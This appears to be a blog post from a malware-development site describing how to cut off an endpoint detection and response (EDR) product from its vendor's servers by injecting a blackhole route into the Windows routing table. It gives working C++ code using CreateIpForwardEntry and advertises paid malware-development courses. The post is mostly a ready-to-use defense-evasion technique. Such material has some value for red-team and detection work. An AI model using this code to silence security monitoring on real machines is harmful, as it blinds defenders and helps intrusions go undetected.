Blocking EDR Outgoing Connections Using the Routing Table
Welcome to this new post! Today, we’ll explore how to block connections from Endpoint Detection and Response (EDR) systems to their external servers, specifically those operated by the EDR provider. We’ll accomplish this by manipulating the system’s routing table, effectively preventing the EDR software from communicating with the company’s remote servers. This method can be useful in various scenarios, such as testing, security assessments, or controlling network traffic.
Our Malware Development Text Modules subscription is finally here! Dive deep into Windows OS malware techniques, from beginner to advanced, all in C++.
- New module every 15 days
- Over 45 minutes of reading time per module
- Starting at just $5/month
Also here you have my first course that basically it’s a Introduction to Windows Malware Development using C++. It’s available from $15.
Code
One of the worst thing about this technique it’s that you need to execute this code with administrator privileges, but you are so lucky because i have some codes to escalate privileges like this:
Code from:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <iphlpapi.h>
#include <stdio.h>
#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")
#define IPCONV(a,b,c,d) ((a) | ((b)&0xff)<<8 | ((c)&0xff)<<16 | ((d)&0xff)<<24)
int main(int argc, char** argv) {
DWORD dwStatus = 0;
MIB_IPFORWARDROW row;
// Zero out the structure
memset(&row, 0, sizeof(MIB_IPFORWARDROW));
// DESTINATION ADDRESS
row.dwForwardDest = IPCONV(8, 8, 8, 8); // 8.8.8.8
// DESTINATION MASK
row.dwForwardMask = 0xFFFFFFFF; // 255.255.255.255
// NEXT HOP
row.dwForwardNextHop = IPCONV(192, 168, 1, 119); // 192.168.1.119
// Use the correct interface index for the Ethernet adapter
row.dwForwardIfIndex = 12;
// Protocol
row.dwForwardProto = MIB_IPPROTO_NETMGMT;
// Metric
row.dwForwardMetric1 = 1;
// Add the new route to the routing table
dwStatus = CreateIpForwardEntry(&row);
if (dwStatus == NO_ERROR)
printf("New route successfully injected\n");
else if (dwStatus == ERROR_INVALID_PARAMETER)
printf("Invalid parameter.\n");
else if (dwStatus == ERROR_NOT_FOUND)
printf("Element not found.\n");
else
printf("Error: %d\n", dwStatus);
return 0;
}
We are modyfing the system’s routing table to block network traffic to a specific IP address. It sets up a new route that directs any traffic destined for the IP address 8.8.8.8 (Google DNS) to a different, non-existent IP address (192.168.1.119). This redirection prevents any data from reaching the intended destination, effectively blocking the connection. The program uses Windows-specific libraries to access and manipulate the routing table, and it provides feedback on whether the new route was successfully added or if an error occurred.
And when you execute this code and look at the route table with this command:
route print
Conclusions
In this article, we demonstrated how to block Endpoint Detection and Response (EDR) outgoing connections by manipulating the system’s routing table. By redirecting traffic intended for specific external servers to a non-existent IP address, we effectively prevent the EDR software from communicating with its provider’s servers. This approach can be valuable for various purposes, including security assessments, network traffic control, and testing environments where controlling EDR behavior is crucial.
We also noted that implementing this technique requires administrative privileges and careful handling of network configuration. The provided code uses Windows-specific libraries to modify the routing table and offers feedback on the success or failure of the route addition. While this method offers a direct way to influence EDR communication, it’s important to apply such techniques responsibly and within ethical boundaries, ensuring compliance with applicable regulations and best practices.
S12.